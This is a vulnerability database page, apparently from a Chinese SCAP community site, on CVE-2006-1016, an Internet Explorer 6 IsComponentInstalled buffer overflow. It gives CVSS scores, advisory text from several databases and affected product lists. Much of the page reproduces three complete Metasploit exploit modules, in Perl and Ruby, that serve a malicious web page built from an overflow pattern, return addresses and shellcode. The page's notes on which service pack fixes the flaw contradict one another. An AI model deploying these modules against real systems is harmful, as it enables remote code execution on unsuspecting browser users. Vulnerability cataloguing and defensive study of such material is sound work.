CVE-2006-1016
CVSS7.5
发布时间 :2006-03-06 19:02:00
修订时间 :2008-09-05 17:00:48
NMCOEPS    

[原文]Buffer overflow in the IsComponentInstalled method in Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument.


[CNNVD]Microsoft Internet Explorer IsComponentInstalled缓冲区溢出漏洞(CNNVD-200603-078)

        在Internet Explorer 6.0的IsComponentInstalled方法中的缓冲区溢出,当应用于Windows 2000 SP4版本之前或Windows XP SP1版本之前时,允许远程攻击者通过JavaScript脚本用一个长首字参数调用IsComponentInstalled,执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1016
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1016
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-078
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24923
(UNKNOWN)  XF  ie-iscomponentinstalled-bo(24923)
http://www.metasploit.com/projects/Framework/modules/exploits/ie_iscomponentinstalled.pm
(UNKNOWN)  MISC  http://www.metasploit.com/projects/Framework/modules/exploits/ie_iscomponentinstalled.pm
http://metasploit.com/projects/Framework/exploits.html#ie_iscomponentinstalled
(UNKNOWN)  MISC  http://metasploit.com/projects/Framework/exploits.html#ie_iscomponentinstalled
http://www.securityfocus.com/bid/16870
(UNKNOWN)  BID  16870

- 漏洞信息

Microsoft Internet Explorer IsComponentInstalled缓冲区溢出漏洞
高危 缓冲区溢出
2006-03-06 00:00:00 2006-03-08 00:00:00
远程  
        在Internet Explorer 6.0的IsComponentInstalled方法中的缓冲区溢出,当应用于Windows 2000 SP4版本之前或Windows XP SP1版本之前时,允许远程攻击者通过JavaScript脚本用一个长首字参数调用IsComponentInstalled,执行任意代码。

- 公告与补丁

        目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本.

- 漏洞信息 (1536)

MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit (EDBID:1536)
windows remote
2006-02-28 Verified
0 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_iscomponentinstalled;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };
  
my $info =
  {
	'Name'           => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow',
	'Version'        => '$Revision: 1.2 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com>',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a stack overflow in Internet Explorer. This bug was
		patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32' ],
	'Priv'           => 0,

	'AutoOpts'       => { 'EXITFUNC' => 'thread' },
	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Prepend'    => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",	  
		'Space'      => 512,
		'BadChars'   => "\x00\x5c\x0a\x0d\x22",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Windows XP SP0 with Internet Explorer 6.0', 0x71aa16e5 ]
	  ],
	
	'Keys'           => [ 'ie' ],

	'DisclosureDate' => 'Feb 24 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
		Pex::Utils::SourceIP('1.2.3.4') :
		$self->GetVar('HTTPHOST');

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		
		$line =~ s/^\s+|\s+$//g;
		
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}
	
	$self->PrintLine("[*] Client connected from $rhost:$rport ($agent)");

	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

	$fd->Close();
}

sub GenerateHTML {
	my $self        = shift;
	my $target      = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $pattern     = Pex::Text::AlphaNumText(8192);
	
	substr($pattern, 755, 4, pack('V',  $target->[1] ));
	substr($pattern, 755 + 2888, length($shellcode), $shellcode);

	my $data        = qq|
<html>
<head>
	<title>One second please...</title>
	<script>
		function window.onload() {
			oClientCaps.style.behavior = "url(#default#clientCaps)";
			oClientCaps.isComponentInstalled("$pattern", "componentid");
		}
	</script>
</head>
<body id="oClientCaps">
One second please...
</body>
</html>
|;
	return $data;
}

sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}
1;


# milw0rm.com [2006-02-28]
		

- 漏洞信息 (16549)

Internet Explorer isComponentInstalled Overflow (EDBID:16549)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ie_iscomponentinstalled.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer isComponentInstalled Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Internet Explorer. This bug was
				patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
				],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-1016' ],
					[ 'OSVDB', '31647' ],
					[ 'BID', '16870' ],
				],
			'Payload'        =>
				{
					'Space'          => 512,
					'BadChars'       => "\x00\x5c\x0a\x0d\x22",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' =>  0x71ab8e4a } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Create the overflow string
		pattern = rand_text_alpha(8192)

		# Smash the return address with a bogus pointer
		pattern[744, 4] = [0xffffffff].pack('V')

		# Handle the exception :-)
		seh = generate_seh_payload(target.ret)
		pattern[6439, seh.length] = seh


		# Build out the HTML response page
		var_client = rand_text_alpha(rand(30)+2)
		var_html   = rand_text_alpha(rand(30)+2)

		content = %Q|
<html>
<head>
	<script>
		function window.onload() {
			#{var_client}.style.behavior = "url(#default#clientCaps)";
			#{var_client}.isComponentInstalled( "__pattern__" ,  "componentid" );
		}
	</script>
</head>
<body id="#{var_client}">
#{var_html}
</body>
</html>
		|

		content = Rex::Text.randomize_space(content)

		# Insert the shellcode
		content.gsub!('__pattern__', pattern)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83130)

Internet Explorer isComponentInstalled Overflow (PacketStormID:F83130)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k,xp
CVE-2006-1016
[点击下载]

This Metasploit module exploits a stack overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer isComponentInstalled Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Internet Explorer. This bug was
				patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2006-1016' ],
					[ 'OSVDB', '31647' ],
					[ 'BID', '16870' ],
				],
			'Payload'        =>
				{
					'Space'          => 512,
					'BadChars'       => "\x00\x5c\x0a\x0d\x22",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' =>  0x71ab8e4a } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Create the overflow string	
		pattern = rand_text_alpha(8192)

		# Smash the return address with a bogus pointer
		pattern[744, 4] = [0xffffffff].pack('V')
		
		# Handle the exception :-)
		seh = generate_seh_payload(target.ret)
		pattern[6439, seh.length] = seh
		

		# Build out the HTML response page
		var_client = rand_text_alpha(rand(30)+2)
		var_html   = rand_text_alpha(rand(30)+2)
		
		content = %Q|
<html >
<head >
	<script >
		function window.onload() {
			#{var_client}.style.behavior = "url(#default#clientCaps)" ;
			#{var_client}.isComponentInstalled( "__pattern__" ,  "componentid" ) ;
		}
	</script >
</head >
<body id = "#{var_client}" > #{var_html}
</body >
</html >
		|

		content = Rex::Text.randomize_space(content)

		# Insert the shellcode		
		content.gsub!('__pattern__', pattern)
		
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息

31647
Microsoft IE Javascript IsComponentInstalled Overflow
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Uncoordinated Disclosure

- 漏洞描述

A buffer overflow exists in Internet Explorer. The IsComponentInstalled component fails to validate the first parameter resulting in a stack overflow. With a specially crafted website, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-02-24 Unknow
2006-03-16 Unknow

- 解决方案

Upgrade to Windows 2000 SP4 or Windows XP SP1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
Boundary Condition Error 16870
Yes No
2006-02-28 12:00:00 2007-11-15 12:39:00
Reported by H D Moore <hdm@metasploit.com>.

- 受影响的程序版本

Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional

- 漏洞讨论

Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser.

This issue was reportedly addressed in Windows 2000 SP4 and Windows XP SP1, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; earlier versions may also be affected.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit is available for the Metasploit framework:

- 解决方案

This issue was reportedly fixed in Service Pack 4 for Windows 2000 and Service Pack 2 for Windows XP, but this has not been confirmed. Please contact the vendor for details.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站